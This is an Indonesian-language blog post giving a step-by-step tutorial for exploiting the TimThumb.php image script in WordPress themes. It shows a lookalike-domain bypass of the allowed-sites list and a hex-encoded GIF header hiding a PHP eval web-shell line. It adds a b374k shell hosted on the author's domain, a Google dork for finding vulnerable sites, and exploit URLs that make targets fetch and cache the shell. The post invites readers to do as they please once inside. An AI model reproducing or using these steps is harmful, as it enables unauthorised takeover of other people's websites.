Filename |
Timthumb Exploit dasar dan lanjutan |
Permission |
rw-r--r-- |
Author |
herbet ginting |
Date and Time |
22.03 |
Label |
|
Action |
|
Artikel ini saya tulis atas permintan seorang teman di forum
dia masih bingung tentang expl timtam [kekek jd laper klo bicaraiin ini]
Sudah banyak sekali artikel tentang timthumb yang sedang ramai di
bicarakan saat ini karena itu Dalam tulisan ini saya sekedar menulis
tulisan tentang timthumb. Exploit timthumb.php ini pertama kali di publish oleh
Mark Maunder ( Vulnerability Disclosed ) di dalam website pribadi nya, dan
kemudian di kembangkan kembali oleh ( Vulnerability Researched )
disini kita akan menggunakan remote injection melalui website domain
Timthumb.php adalah sebuah script php untuk mengubah ukuran gambar di
website , timthum.php sendiri kebanyakan atau hampir 90% di gunakan oleh
theme WordPress Dari semua permintaan fitur TimThumb yang paling populer
adalah mampu untuk memotong gambar dari suatu tempat tertentu, dan mampu
memuat gambar dari situs web eksternal. Secara default TimThumb dapat
mengubah ukuran gambar host di flickr.com, picasa.com, blogger.com,
wordpress.com, dan img.youtube.com.
1. Add Domain
maksud dari add domain di sini adalah add domain website kita atau sub , disini
saya memberikan contoh : domain website saya adalah hermansilalahi.com nah di
sini saya add domain saya menjadi blogger.com.hermansilalahi.com. Kenapa saya
membuat domain seperti itu ? Karena di sini timthumb adalah default plugin
yang hanya bisa mengubah ukuran gambar dari domain berikut :
---------------------------------------------==
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
);
------------------------------------------------
Nah maksud dari $allowedSites adalah timthumb.php hanya bisa mengambil
image dari luar (external image) dari situs di atas.
------------------------------------------------
if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower
($src), 'https://') !== false)
if (strpos (strtolower ($url_info['host']), $site) !== false)
------------------------------------------------
Ingat untuk domain yang saya gunakan tadi blogger.com.hermansilalahi.com hanya
sebuah contoh bisa juga picasa.com.hermansilalahi.com , atau lainnya
2. Create Shell
Maksud dari Create shell adalah di sini kita menambahkan code image GIF yang
telah kita Decode,
------------------------------------------------
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
------------------------------------------------
Kode Hex di atas kita Decode ke String, dan hasil nya :
------------------------------------------------
GIF89a ? ????���???!� ????,???? ? ?? D ?;?
------------------------------------------------
Kode di atas kita masukan di atas script shell, di sini saya menggunakan
shell b374k :
------------------------------------------------
GIF89a ? ????���???!� ????,???? ? ?? D ?;?
<?php
// mdnhacker@gmail.com
// no malware on this code, you can check it by yourself
@error_reporting(0);
@set_time_limit(0);
$code = "script shell"
------------------------------------------------
ingat di sini kita masukan kode hasil Yang telah kita decode tadi di atas
<?php di sini saya save shell tersebut dengan ekstensi b374k.php
3. Upload Shell in Domain Website
Yupz lanjut lagi setelah tadi sudah kita persiapkan senjata atau shell
b374k.php untuk inject kita upload tadi ke domain website kita, di atas
tadi saya sudah add domain blogger.com.hermansilalahi.com nah sekarang kita
upload shell b374k.php Dan hasil dari shell b374k.php yang telah di upload
di website tersebut adalah http:\\blogger.com.hermansilalahi.com/b374k.php
4. Exploitasi
Nah setelah tadi sudah upload shel inject atau senjata tadi yang berada di
http:\\blogger.com.hermansilalahi.com/b374k.php sekarang waktunya kita mencari
target di si mbah google
Di sini saya menggunakan dork dari timthumb.php
adalah :
inurl:/wp-content/themes/twenteen/timthumb.php
Setelah sudah mendapatkan target waktunya exploitasi , contoh untuk
eksploitasi nya adalah :
http://contohtarget.com/wp-content/themes/twenteen/timthumb.php?src=
http:\\blogger.com.hermansilalahi.com/b374k.php
Setelah masuk akan ada pemberitauan :
http://target.com/wp-content/themes/twenteen/../cache/external_565bcf5dxxx.php
setelah terdapat tulisan seperti itu coba kita buka apakah hasil nya masuk
atau tidak , tapi kebanyakn memang jika sudah seperti itu kita telah masuk
dan sudah menanam shell
, yuk mari buka link tersebut :
http://target.com/wp-content/themes/twenteen/cache/external_565bcf5dxxx.php
Nah setelah shell masuk terserah mau di apakan , pergunakan lah sebaik2 nya .
* Untuk versi timthumb.php 1.* - 1.32 ini masih banyak yang bisa kita
eksploitasi, untuk versi 1.32 mungkin sudah tidak bisa di eksploitasi
karena telah di upadte dari develop nya
ref: http://www.exploit-db.com/wordpress-timthumb-exploitation/
0 komentar:
Posting Komentar